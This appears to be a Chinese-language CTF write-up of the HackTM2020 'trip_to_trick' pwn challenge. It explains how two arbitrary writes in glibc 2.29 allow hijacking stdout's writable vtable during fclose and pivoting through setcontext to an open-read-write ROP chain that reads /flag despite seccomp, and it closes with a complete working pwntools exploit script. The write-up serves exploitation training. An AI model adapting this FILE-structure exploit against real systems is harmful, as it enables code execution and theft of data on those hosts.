HackTM2020 trip_to_trick

2020-02-17

看了先知上的一篇文章,这题是在glibc2.29下文件结构的利用，复现一波

程序分析

checksec下,保护全开，拖进IDA，看见有seccomp_init函数，程序开启了沙箱，只允许open read write close mmap mprotect brk rt_sigreturn exit exit_group,这样看的话应该是要orw了

程序先安装了seccomp，然后把_IO_2_1_stdout_+0x8A0地址处设置为只读：

.text:0000000000001399 nohack          proc near               ; CODE XREF: main+35↓p
.text:0000000000001399 ; __unwind {
.text:0000000000001399                 push    rbp
.text:000000000000139A                 mov     rbp, rsp
.text:000000000000139D                 mov     rax, cs:stdout@@GLIBC_2_2_5
.text:00000000000013A4                 add     rax, 8A0h
.text:00000000000013AA                 and     eax, 0FFFh
.text:00000000000013AF                 test    rax, rax
.text:00000000000013B2                 jnz     short loc_13D5
.text:00000000000013B4                 mov     rax, cs:stdout@@GLIBC_2_2_5
.text:00000000000013BB                 add     rax, 8A0h
.text:00000000000013C1                 mov     edx, 1          ; prot
.text:00000000000013C6                 mov     esi, 700h       ; len
.text:00000000000013CB                 mov     rdi, rax        ; addr
.text:00000000000013CE                 call    _mprotect
.text:00000000000013D3                 jmp     short loc_13EB

在这之后会把system函数的地址告诉我们，再给两次任意地址写的机会，最后调用fclose关闭stdin stdout stderr

printf("gift : %p\n", &system, argv);
printf("1 : ");
__isoc99_scanf("%llx %llx", &v4, &v5);
*v4 = v5;
printf("2 : ", &v4);
__isoc99_scanf("%llx %llx", &v4, &v5);
*v4 = v5;
fclose(stdout);
fclose(stdin);
fclose(stderr);
return 0;

漏洞利用

程序的漏洞很明显，就是两次的任意地址写，程序一开始给出了libc的地址，现在的问题是写哪，程序安装了seccomp，one_gadget的方法肯定失效了，且程序会fclose输入输出和错误流，故应该在fclose的时候想办法劫持程序流

如果要靠fclose来劫持程序流程的话，首先想到的肯定是能不能劫持vtable,但是glibc在2.24的时候会对vtable进行check，所以利用这两次任意地址写应该不太好利用。

那回到程序一开始，那个可疑的nohack函数，为什么要把_IO_2_1_stdout+0x8A0地址处0x1000大小设置为可读呢，我们可以用gdb在程序刚刚开始的时候看下内存布局，也看下_IO_2_1_stdout+0x8A0地址处是个啥：

Breakpoint main
pwndbg> p &_IO_2_1_stdout_
$1 = (struct _IO_FILE_plus *) 0x7ffff7f67760 <_IO_2_1_stdout_>
pwndbg> telescope 0x7ffff7f67760+0x8a0
00:0000│   0x7ffff7f68000 (_IO_wfile_jumps_mmap+160) —▸ 0x7ffff7e14940 (_IO_default_imbue) ◂— ret    
01:0008│   0x7ffff7f68008 ◂— 0x0
... ↓
06:0030│   0x7ffff7f68030 (_IO_wfile_jumps+16) —▸ 0x7ffff7e10ff0 (_IO_file_finish) ◂— push   rbp
07:0038│   0x7ffff7f68038 (_IO_wfile_jumps+24) —▸ 0x7ffff7e0b140 (_IO_wfile_overflow) ◂— mov    edx, dword ptr [rdi]

是一些vtable,在我们以往的经验中，io_vtable对应的地址是不可写的，然而这里居然还要mprotect把权限改为只读，说明可能这里原本是可写的，vmmap看下：

0x7ffff7d7f000     0x7ffff7d82000 rw-p     3000 0      
    0x7ffff7d82000     0x7ffff7da7000 r--p    25000 0      /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7ffff7da7000     0x7ffff7f1a000 r-xp   173000 25000  /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7ffff7f1a000     0x7ffff7f63000 r--p    49000 198000 /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7ffff7f63000     0x7ffff7f66000 r--p     3000 1e0000 /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7ffff7f66000     0x7ffff7f69000 rw-p     3000 1e3000 /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7ffff7f69000     0x7ffff7f6d000 rw-p     4000 0

这vtable在glibc2.29下是可写的，（有点神奇

所以我们可以改写_IO_2_1_stdout原本的vtable为其它的能通过vtable check，且可写的vtable

回到程序，我们可以看到这题使用了scanf，可以想到如果我们改写了_IO_2_1_stdin的_IO_buf_end,那我们就可以改写_IO_buf_base到_IO_buf_end区间的值了，这里的思路来自wannaheap，比如我们可以把_IO_buf_end改到_IO_2_1_stdout的后面，就能连_IO_2_1_stdout也一起改掉了

效果：

[DEBUG] Received 0x1a bytes:
    b'gift : 0x7f03353fffd0\n'
    b'1 : '
[*] libc : 0x7f03353ad000
[DEBUG] Sent 0x1e bytes:
    b'0x7f0335591a40 0x7f0335592f00\n'
[*] Switching to interactive mode
[DEBUG] Received 0x4 bytes:
    b'2 : '
2 : $ aaaaaaaaaaaaaaaaaaa
[DEBUG] Sent 0x14 bytes:
    b'aaaaaaaaaaaaaaaaaaa\n'
$

改写_IO_buf_end：

pwndbg> p _IO_2_1_stdin_ 
$2 = {
  file = {
    _flags = -72540021, 
    _IO_read_ptr = 0x7f0335591a90 <_IO_2_1_stdin_+144> "uaaaaa\n\377", 
    _IO_read_end = 0x7f0335591a97 <_IO_2_1_stdin_+151> "\377", 
    _IO_read_base = 0x7f0335591a83 <_IO_2_1_stdin_+131> 'a' <repeats 13 times>, "uaaaaa\n\377", 
    _IO_write_base = 0x7f0335591a83 <_IO_2_1_stdin_+131> 'a' <repeats 13 times>, "uaaaaa\n\377", 
    _IO_write_ptr = 0x7f0335591a83 <_IO_2_1_stdin_+131> 'a' <repeats 13 times>, "uaaaaa\n\377", 
    _IO_write_end = 0x7f0335591a83 <_IO_2_1_stdin_+131> 'a' <repeats 13 times>, "uaaaaa\n\377", 
    _IO_buf_base = 0x7f0335591a83 <_IO_2_1_stdin_+131> 'a' <repeats 13 times>, "uaaaaa\n\377", 
    _IO_buf_end = 0x7f0335592f00 <_IO_wfile_jumps_maybe_mmap+96> "`dC5\003\177", 
    _IO_save_base = 0x0, 
    _IO_backup_base = 0x0, 
    _IO_save_end = 0x0, 
    _markers = 0x0, 
    _chain = 0x0, 
    _fileno = 0, 
    _flags2 = 0, 
    _old_offset = -1, 
    _cur_column = 0, 
    _vtable_offset = 0 '\000', 
    _shortbuf = "a", 
    _lock = 0x6161616161616161, 
    _offset = -69135773397327499, 
    _codecvt = 0x0, 
    _wide_data = 0x7f0335591ae0 <_IO_wide_data_0>, 
    _freeres_list = 0x0, 
    _freeres_buf = 0x0, 
    __pad5 = 0, 
    _mode = -1, 
    _unused2 = '\000' <repeats 19 times>
  }, 
  vtable = 0x7f0335593560 <_IO_file_jumps>
}
pwndbg> telescope 0x7f0335591a83
00:0000│   0x7f0335591a83 (_IO_2_1_stdin_+131) ◂— 0x6161616161616161 ('aaaaaaaa')
01:0008│   0x7f0335591a8b (_IO_2_1_stdin_+139) ◂— 0x6161756161616161 ('aaaaauaa')
02:0010│   0x7f0335591a93 (_IO_2_1_stdin_+147) ◂— 0xff0a616161
03:0018│   0x7f0335591a9b (_IO_2_1_stdin_+155) ◂— 0x591ae00000000000
04:0020│   0x7f0335591aa3 (_IO_2_1_stdin_+163) ◂— 0x7f0335
05:0028│   0x7f0335591aab (_IO_2_1_stdin_+171) ◂— 0x0
... ↓
07:0038│   0x7f0335591abb (_IO_2_1_stdin_+187) ◂— 0xffffff0000000000
pwndbg>

当然无脑输入aaaaaaa程序会奔溃，所以我们要保留那些地址原本的值，只修改我们想要修改的地方

思路

有了上面的分析，我们可以得到以下一个思路：

第一次任意地址写，我们覆盖_IO_2_1_stdin的_IO_buf_end，使得我们能够改写_IO_buf_base到_IO_buf_end区间的值
修改_IO_2_1_stdout_的vtable,改为一个在可写区间的vtable,为什么改stdout呢，因为程序第一个调用是fclose(stdout),所以就选择覆盖掉stdout，而且如果stdout真的被close了，那输出流也就没了，远程的服务器一般不回显stderr

要注意的是我们要改写_IO_2_1_stdout_，在覆盖的过程中会覆盖掉很多的指针，结构体啥的，有的要保留他们原本的值，以免程序出错

还有一个问题是怎么找到符合条件的vtable，我找了个带符号表的glibc2.29,写了个简单脚本：

from pwn import *
libc = ELF("./libc.so.6",checksec=False)
for sym in libc.symbols:
	if "jump" in sym:
		print(sym)

输出：

_IO_file_jumps
_IO_wfile_jumps
jump_table
_IO_helper_jumps
_IO_cookie_jumps
_IO_proc_jumps
_IO_str_chk_jumps
_IO_wmem_jumps
_IO_mem_jumps
_IO_file_jumps_mmap
_IO_wstr_jumps
_IO_obstack_jumps
__GI__IO_wfile_jumps
_IO_strn_jumps
_IO_wstrn_jumps
__libc_utmp_jump_table
__GI__IO_file_jumps
_IO_file_jumps_maybe_mmap
_IO_wfile_jumps_mmap
_IO_wfile_jumps_maybe_mmap
_IO_str_jumps

然后一个个看，（手动滑稽，_IO_helper_jumps,_IO_cookie_jumps这些都是可以的，且都在_IO_2_1_stdout_后面，可以一起覆盖掉：

pwndbg> p &_IO_helper_jumps 
$2 = (const struct _IO_jump_t *) 0x7fb0f5e5f960 <_IO_helper_jumps>
pwndbg> telescope 0x7fb0f5e5f960
00:0000│   0x7fb0f5e5f960 (_IO_helper_jumps) ◂— 0x0
01:0008│   0x7fb0f5e5f968 (_IO_helper_jumps+8) ◂— 0x0
... ↓
pwndbg> p &_IO_2_1_stdout_ 
$3 = (struct _IO_FILE_plus *) 0x7fb0f5e5f760 <_IO_2_1_stdout_>
pwndbg> p &_IO_cookie_jumps 
$4 = (const struct _IO_jump_t *) 0x7fb0f5e5fae0 <_IO_cookie_jumps>
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x56275a7c2000     0x56275a7c3000 r--p     1000 0      /mnt/hgfs/shared/codegate2020/trip_to_trick/trip_to_trick
    0x56275a7c3000     0x56275a7c4000 r-xp     1000 1000   /mnt/hgfs/shared/codegate2020/trip_to_trick/trip_to_trick
    0x56275a7c4000     0x56275a7c5000 r--p     1000 2000   /mnt/hgfs/shared/codegate2020/trip_to_trick/trip_to_trick
    0x56275a7c5000     0x56275a7c6000 r--p     1000 2000   /mnt/hgfs/shared/codegate2020/trip_to_trick/trip_to_trick
    0x56275a7c6000     0x56275a7c7000 rw-p     1000 3000   /mnt/hgfs/shared/codegate2020/trip_to_trick/trip_to_trick
    0x56275b4de000     0x56275b4ff000 rw-p    21000 0      [heap]
    0x7fb0f5c77000     0x7fb0f5c7a000 rw-p     3000 0      
    0x7fb0f5c7a000     0x7fb0f5c9f000 r--p    25000 0      /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7fb0f5c9f000     0x7fb0f5e12000 r-xp   173000 25000  /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7fb0f5e12000     0x7fb0f5e5b000 r--p    49000 198000 /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7fb0f5e5b000     0x7fb0f5e5e000 r--p     3000 1e0000 /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7fb0f5e5e000     0x7fb0f5e60000 rw-p     2000 1e3000 /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7fb0f5e60000     0x7fb0f5e61000 r--p     1000 1e5000 /usr/lib/x86_64-linux-gnu/libc-2.29.so
    0x7fb0f5e61000     0x7fb0f5e65000 rw-p     4000 0      
    0x7fb0f5e65000     0x7fb0f5e88000 r--p    23000 0      /usr/lib/x86_64-linux-gnu/libseccomp.so.2.4.1

下个触发调用vtable处的断点：

 RAX  0xd68
 RBX  0x7f7c1582e760 (_IO_2_1_stdout_) ◂— 0xfbad2807
 RCX  0x0
 RDX  0x7f7c1582e960 (_IO_helper_jumps) ◂— 0x67616c662f /* '/flag' */
 RDI  0x7f7c1582e760 (_IO_2_1_stdout_) ◂— 0xfbad2807
 RSI  0x7f7c1582e703 (_IO_2_1_stderr_+131) ◂— 0x8305700000000000
 R8   0x7f7c15646740 ◂— 0x7f7c15646740
 R9   0x7f7c15646740 ◂— 0x7f7c15646740
 R10  0x7f7c157e2ae0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000
 R11  0x246
 R12  0x0
 R13  0x7ffd5b48f340 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7f7c1582e960 (_IO_helper_jumps) ◂— 0x67616c662f /* '/flag' */
 RSP  0x7ffd5b48f1f0 —▸ 0x7f7c1582e760 (_IO_2_1_stdout_) ◂— 0xfbad2807
 RIP  0x7f7c156d7ef2 (_IO_file_close_it+98) ◂— call   qword ptr [rbp + 0x88]
─────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
   0x7f7c156d7ee0 <_IO_file_close_it+80>     mov    rcx, rbp
   0x7f7c156d7ee3 <_IO_file_close_it+83>     sub    rcx, rdx
   0x7f7c156d7ee6 <_IO_file_close_it+86>     cmp    rax, rcx
   0x7f7c156d7ee9 <_IO_file_close_it+89>     jbe    _IO_file_close_it+336 <0x7f7c156d7fe0>
 
   0x7f7c156d7eef <_IO_file_close_it+95>     mov    rdi, rbx
 ► 0x7f7c156d7ef2 <_IO_file_close_it+98>     call   qword ptr [rbp + 0x88] <0x7f7c1569ee35>
        rdi: 0x7f7c1582e760 (_IO_2_1_stdout_) ◂— 0xfbad2807
        rsi: 0x7f7c1582e703 (_IO_2_1_stderr_+131) ◂— 0x8305700000000000
        rdx: 0x7f7c1582e960 (_IO_helper_jumps) ◂— 0x67616c662f /* '/flag' */
        rcx: 0x0
 
   0x7f7c156d7ef8 <_IO_file_close_it+104>    mov    ebp, eax
   0x7f7c156d7efa <_IO_file_close_it+106>    mov    eax, dword ptr [rbx + 0xc0]
   0x7f7c156d7f00 <_IO_file_close_it+112>    test   eax, eax
   0x7f7c156d7f02 <_IO_file_close_it+114>    jle    _IO_file_close_it+174 <0x7f7c156d7f3e>
 
   0x7f7c156d7f04 <_IO_file_close_it+116>    mov    rax, qword ptr [rbx + 0xa0]

此处call qword ptr [rbp + 0x88] ，其中rbp指向**_IO_helper_jumps，（而且rdx也恰好指向_IO_helper_jumps**，配合setcontext+53处的指令，简直完美）这里对应源码：

In file: /usr/src/glibc/glibc-2.29/libio/fileops.c
   137   else
   138     write_status = 0;
   139 
   140   _IO_unsave_markers (fp);
   141 
 ► 142   int close_status = ((fp->_flags2 & _IO_FLAGS2_NOCLOSE) == 0
   143 		      ? _IO_SYSCLOSE (fp) : 0);
   144 
   145   /* Free buffer. */
   146   if (fp->_mode > 0)
   147     {

于是乎我们只要把_IO_helper_jumps+0x88处修改为setcontext+53，然后布置好数据，进行ROP即可

最终exp:

from pwn import *

context.arch = 'amd64'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))
     
def main(host,port=10106):
	global p
	if host:
		p = remote(host,port)
	else:
		p = process("./trip_to_trick")
		# gdb.attach(p)
		debug(0)
	p.recvuntil("gift : ")
	libc.address = int(p.recvuntil("\n")[:-1],16) - libc.symbols["system"]
	info("libc : " + hex(libc.address))
	p.recvuntil("1 : ")
	p.sendline(hex(libc.symbols["_IO_2_1_stdin_"]+0x40)+' '+hex(libc.address+0x1e6000-0x100))
	p.recvuntil("2 : ")
	pause()
	payload = b"\x00"*5+p64(0x1e7590+libc.address)+p64(0xffffffffffffffff)+p64(0)+p64(0x1e4ae0+libc.address)+p64(0)*3+p64(0xffffffff)+p64(0)*2
	payload += p64(0x1e6560+libc.address)+p64(0)*0x26+p64(0x1e6020+libc.address)+p64(0)*6+p64(1)+b'\x00'*2136+p64(0)+p64(0x1e4c40+libc.address)
	payload += p64(0)+p64(1)+p64(0x21000)*2+b'\x00'*0x88+b"\x00"*0x68+p64(0x19a3e0+libc.address)+b'\x00'*0x90
	payload += p64(libc.symbols["_IO_2_1_stderr_"])+p64(0)*3+p64(0xfbad2087)+p64(0x1e5703+libc.address)*8
	payload += p64(0)*4+p64(libc.symbols["_IO_2_1_stdout_"])+p64(2)+p64(0xffffffffffffffff)+p64(0)+p64(0x1e7570+libc.address)+p64(0xffffffffffffffff)
	payload += p64(0)+p64(0x1e4780+libc.address)+p64(0)*6+p64(0x1e6560+libc.address)+p64(0xfbad2887)+p64(0x1e5703+libc.address)*8+p64(0)*4
	payload += p64(libc.symbols["_IO_2_1_stdin_"])+p64(1)+p64(0xffffffffffffffff)+p64(0)+p64(0x1e7580+libc.address)+p64(0xffffffffffffffff)
	payload += p64(0)+p64(0x1e48c0+libc.address)+p64(0)*3+p64(0xffffffff)+p64(0)*2+p64(0x1e5960+libc.address)
	payload += p64(libc.symbols["_IO_2_1_stderr_"])+p64(libc.symbols["_IO_2_1_stdout_"])+p64(libc.symbols["_IO_2_1_stdin_"])
	payload += b'\x00'*0x108
	# 00000000000026542: pop rdi; ret;
	# 0x000000000012bdc9: pop rdx; pop rsi; ret;
	# 0x0000000000047cf8: pop rax; ret;
	# 0x00000000000cf6c5: syscall; ret;x
	p_rdi = 0x0000000000026542+libc.address
	p_rdx_rsi = 0x000000000012bdc9+libc.address
	p_rax = 0x0000000000047cf8+libc.address
	syscall_ret = 0x00000000000cf6c5+libc.address
	payload += b'/flag'+b'\x00'*3
	payload += p64(0)*12 #offset 0x68
	payload += p64(0x1e5960+libc.address)	#rdi &_IO_helper_jumps
	payload += p64(0)		#rsi
	payload += p64(0x1e5960+libc.address+0x200)	#rbp
	payload += p64(0)		#rbx 
	payload += p64(libc.symbols["setcontext"]+53) #rdx  offset 0x88
	payload += p64(0)*2
	payload += p64(0x1e5960+libc.address+0xb0)	# rsp
	payload += p64(p_rax)		#rcx
	payload += p64(2)
	payload += p64(p_rdx_rsi)+p64(0)*2+p64(syscall_ret)
	payload += p64(p_rdi)+p64(3)+p64(p_rdx_rsi)+p64(0x80)+p64(0x1e5960+libc.address+0x200)+p64(p_rax)+p64(0)+p64(syscall_ret)
	payload += p64(p_rdi)+p64(1)+p64(p_rax)+p64(1)+p64(syscall_ret)
	payload += p64(p_rdi)+p64(0)+p64(p_rax)+p64(0)+p64(syscall_ret)
	
	p.send(payload)
	p.interactive()
	
if __name__ == "__main__":
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	main(args['REMOTE'])

总结

vtable居然在glibc2.29下可写了，真的神奇

参考链接

https://xz.aliyun.com/t/7205